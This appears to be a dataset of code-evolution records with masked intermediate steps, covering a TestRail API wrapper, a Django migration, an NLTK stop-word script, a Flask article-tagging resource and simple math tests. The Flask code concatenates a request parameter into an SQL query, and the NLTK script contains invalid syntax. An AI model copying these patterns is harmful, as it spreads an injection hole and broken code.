"step-4": "<mask token>\n\n\nclass TestRailAPI(Session):\n \"\"\"Categories\"\"\"\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) ->_category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
"step-5": "\"\"\"\nTestRail API Categories\n\"\"\"\n\nfrom . import _category\nfrom ._session import Session\n\n\nclass TestRailAPI(Session):\n \"\"\"Categories\"\"\"\n\n @property\n def attachments(self) -> _category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) -> _category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) -> _category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) -> _category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) -> _category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) -> _category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) -> _category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) -> _category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) -> _category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) -> _category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) -> _category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) -> _category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) -> _category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) -> _category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) -> _category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) -> _category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) -> _category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) -> _category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) -> _category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) -> _category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
"step-ids": [
17,
20,
21,
22,
24
]
}
|
[
17,
20,
21,
22,
24
] |
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Print Stop words
stop_words = set(stopwords.words("english"))
print(stop_words)
example_text = "This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up"
words = word_tokenize(example_text)
filtered_sentence = []
for w in words:
for w not in stop_words:
filtered_sentence.append(w)
#print filtered sentences
print(filtered_sentence)
#print in a line
filtered_sentence1 = [w for w in words if not w in stop_words]
#print filtered sentences
print(filtered_sentence1)
|
normal
|
{
"blob_id": "90f5629ac48edfccea57243ffb6188a98123367d",
"index": 5197,
"step-1": "from nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n#Print Stop words\r\nstop_words = set(stopwords.words(\"english\"))\r\nprint(stop_words)\r\n\r\nexample_text = \"This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up\"\r\n\r\nwords = word_tokenize(example_text)\r\n\r\nfiltered_sentence = []\r\nfor w in words:\r\n for w not in stop_words:\r\n filtered_sentence.append(w)\r\n\r\n#print filtered sentences\r\nprint(filtered_sentence)\r\n\r\n#print in a line\r\nfiltered_sentence1 = [w for w in words if not w in stop_words]\r\n\r\n#print filtered sentences\r\nprint(filtered_sentence1)\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [
('venue', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Images',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', versatileimagefield.fields.VersatileImageField(upload_to=b'images', verbose_name=b'Image')),
('created_at', models.DateTimeField(help_text=b'Date when category created.', verbose_name=b'Created At', auto_now_add=True)),
('updated_at', models.DateTimeField(help_text=b'Date when category updated.', verbose_name=b'Updated At', auto_now=True)),
('category', models.ForeignKey(related_name='images', blank=True, to='venue.Category', null=True)),
],
),
]
|
normal
|
{
"blob_id": "09bf7460b2c928bf6e1346d9d1e2e1276540c080",
"index": 3099,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('venue', '0001_initial')]\n operations = [migrations.CreateModel(name='Images', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('image', versatileimagefield.fields.\n VersatileImageField(upload_to=b'images', verbose_name=b'Image')), (\n 'created_at', models.DateTimeField(help_text=\n b'Date when category created.', verbose_name=b'Created At',\n auto_now_add=True)), ('updated_at', models.DateTimeField(help_text=\n b'Date when category updated.', verbose_name=b'Updated At',\n auto_now=True)), ('category', models.ForeignKey(related_name=\n 'images', blank=True, to='venue.Category', null=True))])]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nimport versatileimagefield.fields\n\n\nclass Migration(migrations.Migration):\n dependencies = [('venue', '0001_initial')]\n operations = [migrations.CreateModel(name='Images', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('image', versatileimagefield.fields.\n VersatileImageField(upload_to=b'images', verbose_name=b'Image')), (\n 'created_at', models.DateTimeField(help_text=\n b'Date when category created.', verbose_name=b'Created At',\n auto_now_add=True)), ('updated_at', models.DateTimeField(help_text=\n b'Date when category updated.', verbose_name=b'Updated At',\n auto_now=True)), ('category', models.ForeignKey(related_name=\n 'images', blank=True, to='venue.Category', null=True))])]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport versatileimagefield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('venue', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Images',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', versatileimagefield.fields.VersatileImageField(upload_to=b'images', verbose_name=b'Image')),\n ('created_at', models.DateTimeField(help_text=b'Date when category created.', verbose_name=b'Created At', auto_now_add=True)),\n ('updated_at', models.DateTimeField(help_text=b'Date when category updated.', verbose_name=b'Updated At', auto_now=True)),\n ('category', models.ForeignKey(related_name='images', blank=True, to='venue.Category', null=True)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(10):
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
<|reserved_special_token_1|>
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10):
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
<|reserved_special_token_1|>
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10): # 9를 입력해서 첨에 틀림 !
count = 0
for j in range(len(num)):
if i == int(num[j]):
count += 1
else:
continue
print(count)
|
flexible
|
{
"blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876",
"index": 4633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n",
"step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
__author__ = 'jz'
from flask.ext import restful
from flask.ext.restful import reqparse
from scs_app.db_connect import *
parser = reqparse.RequestParser()
parser.add_argument('count', type=str)
class MulActionResource(restful.Resource):
def __init__(self):
self.db = get_connection()
def post(self, type):
args = parser.parse_args()
count = args.get('count')
sids = []
if type == 'extract':
# todo multi extract
pass
elif type == 'location':
articles = self.db.query(
"select article.sid,title,content from article left join site on article.site_sid=site.sid"
" where lang='cn' and location_sid IS NULL LIMIT 0," + count)
locations = self.db.query('select sid,name,data from location where name!=%s', (u'其它',))
other_sid = self.db.get('select sid from location where name=%s', (u'其它',))['sid']
for article in articles:
sids.append(article['sid'])
content = article['title'] + article['content']
lc = False
for location in locations:
sid = location['sid']
words = [location['name']]
if location['data']:
words += location['data'].split('|')
for word in words:
if word in content:
lc = True
self.db.update('update article set location_sid=%s where sid=%s', (sid, article['sid']))
break
if lc:
break
if not lc:
self.db.update('update article set location_sid=%s where sid=%s', (other_sid, article['sid']))
return {
'count': count,
'sids': sids
}
else:
return 'no such command', 404
|
normal
|
{
"blob_id": "44476a32b8ab68820d73955321e57b7d1b608beb",
"index": 6823,
"step-1": "<mask token>\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-2": "<mask token>\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-3": "__author__ = 'jz'\n<mask token>\nparser = reqparse.RequestParser()\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-4": "__author__ = 'jz'\nfrom flask.ext import restful\nfrom flask.ext.restful import reqparse\nfrom scs_app.db_connect import *\nparser = reqparse.RequestParser()\nparser.add_argument('count', type=str)\n\n\nclass MulActionResource(restful.Resource):\n\n def __init__(self):\n self.db = get_connection()\n\n def post(self, type):\n args = parser.parse_args()\n count = args.get('count')\n sids = []\n if type == 'extract':\n pass\n elif type == 'location':\n articles = self.db.query(\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid where lang='cn' and location_sid IS NULL LIMIT 0,\"\n + count)\n locations = self.db.query(\n 'select sid,name,data from location where name!=%s', (u'其它',))\n other_sid = self.db.get('select sid from location where name=%s',\n (u'其它',))['sid']\n for article in articles:\n sids.append(article['sid'])\n content = article['title'] + article['content']\n lc = False\n for location in locations:\n sid = location['sid']\n words = [location['name']]\n if location['data']:\n words += location['data'].split('|')\n for word in words:\n if word in content:\n lc = True\n self.db.update(\n 'update article set location_sid=%s where sid=%s'\n , (sid, article['sid']))\n break\n if lc:\n break\n if not lc:\n self.db.update(\n 'update article set location_sid=%s where sid=%s',\n (other_sid, article['sid']))\n return {'count': count, 'sids': sids}\n else:\n return 'no such command', 404\n",
"step-5": "# -*- coding: utf-8 -*-\r\n__author__ = 'jz'\r\n\r\nfrom flask.ext import restful\r\nfrom flask.ext.restful import reqparse\r\n\r\nfrom scs_app.db_connect import *\r\n\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('count', type=str)\r\n\r\n\r\nclass MulActionResource(restful.Resource):\r\n def __init__(self):\r\n self.db = get_connection()\r\n\r\n def post(self, type):\r\n args = parser.parse_args()\r\n count = args.get('count')\r\n sids = []\r\n if type == 'extract':\r\n # todo multi extract\r\n pass\r\n elif type == 'location':\r\n articles = self.db.query(\r\n \"select article.sid,title,content from article left join site on article.site_sid=site.sid\"\r\n \" where lang='cn' and location_sid IS NULL LIMIT 0,\" + count)\r\n locations = self.db.query('select sid,name,data from location where name!=%s', (u'其它',))\r\n other_sid = self.db.get('select sid from location where name=%s', (u'其它',))['sid']\r\n for article in articles:\r\n sids.append(article['sid'])\r\n content = article['title'] + article['content']\r\n lc = False\r\n for location in locations:\r\n sid = location['sid']\r\n words = [location['name']]\r\n if location['data']:\r\n words += location['data'].split('|')\r\n for word in words:\r\n if word in content:\r\n lc = True\r\n self.db.update('update article set location_sid=%s where sid=%s', (sid, article['sid']))\r\n break\r\n if lc:\r\n break\r\n if not lc:\r\n self.db.update('update article set location_sid=%s where sid=%s', (other_sid, article['sid']))\r\n return {\r\n 'count': count,\r\n 'sids': sids\r\n }\r\n else:\r\n return 'no such command', 404",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math_series.series as func
""" Testing for fibonacci function """
def test_fibonacci_zero():
actual = func.fibonacci(0)
expected = 0
assert actual == expected
def test_fibonacci_one():
actual = func.fibonacci(1)
expected = 1
assert actual == expected
def test_fibonacci_negative():
actual = func.fibonacci(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_fibonacci_else():
actual = func.fibonacci(6)
expected = 8
assert actual == expected
""" Testing for lucas function """
def test_lucas_zero():
actual = func.lucas(0)
expected = 2
assert actual == expected
def test_lucas_one():
actual = func.lucas(1)
expected = 1
assert actual == expected
def test_lucas_negative():
actual = func.lucas(-5)
expected = "Negative values are not allowable"
assert actual == expected
def test_lucas_else():
actual = func.lucas(6)
expected = 18
assert actual == expected
""" Testing for non_fibonacci_lucas function """
def test_non_fibonacci_lucas_zero():
actual = func.non_fibonacci_lucas(0,2,4)
expected = 2
assert actual == expected
def test_non_fibonacci_lucas_one():
actual = func.non_fibonacci_lucas(1,2,4)
expected = 4
assert actual == expected
def test_non_fibonacci_lucas_negative():
actual = func.non_fibonacci_lucas(-5,2,4)
expected = "Negative values are not allowable"
assert actual == expected
def test_non_fibonacci_lucas_else():
actual = func.non_fibonacci_lucas(3,2,4)
expected = 10
assert actual == expected
|
normal
|
{
"blob_id": "49722f640eec02029865fd702e13e485eda6391b",
"index": 8126,
"step-1": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-2": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-3": "<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-4": "import math_series.series as func\n<mask token>\n\n\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_lucas_else():\n actual = func.lucas(6)\n expected = 18\n assert actual == expected\n\n\n<mask token>\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0, 2, 4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1, 2, 4)\n expected = 4\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5, 2, 4)\n expected = 'Negative values are not allowable'\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3, 2, 4)\n expected = 10\n assert actual == expected\n",
"step-5": "import math_series.series as func\n\n\"\"\" Testing for fibonacci function \"\"\"\ndef test_fibonacci_zero():\n actual = func.fibonacci(0)\n expected = 0\n assert actual == expected\n\ndef test_fibonacci_one():\n actual = func.fibonacci(1)\n expected = 1\n assert actual == expected\n\n\ndef test_fibonacci_negative():\n actual = func.fibonacci(-5)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_fibonacci_else():\n actual = func.fibonacci(6)\n expected = 8\n assert actual == expected\n\n\"\"\" Testing for lucas function \"\"\"\n\ndef test_lucas_zero():\n actual = func.lucas(0)\n expected = 2\n assert actual == expected\n\n\ndef test_lucas_one():\n actual = func.lucas(1)\n expected = 1\n assert actual == expected\n\n\n\ndef test_lucas_negative():\n actual = func.lucas(-5)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_lucas_else():\n actual = func.lucas(6)\n expected = 18\n assert actual == expected\n\n\n\"\"\" Testing for non_fibonacci_lucas function \"\"\"\n\n\ndef test_non_fibonacci_lucas_zero():\n actual = func.non_fibonacci_lucas(0,2,4)\n expected = 2\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_one():\n actual = func.non_fibonacci_lucas(1,2,4)\n expected = 4\n assert actual == expected\n\n\n\ndef test_non_fibonacci_lucas_negative():\n actual = func.non_fibonacci_lucas(-5,2,4)\n expected = \"Negative values are not allowable\"\n assert actual == expected\n\n\ndef test_non_fibonacci_lucas_else():\n actual = func.non_fibonacci_lucas(3,2,4)\n expected = 10\n assert actual == expected",
"step-ids": [
8,
9,
11,
13,
14
]
}
|
[
8,
9,
11,
13,
14
] |
import time
if __name__ == '__main__':
for i in range(10):
print('here %s' % i)
time.sleep(1)
print('TEST SUCEEDED')
|
normal
|
{
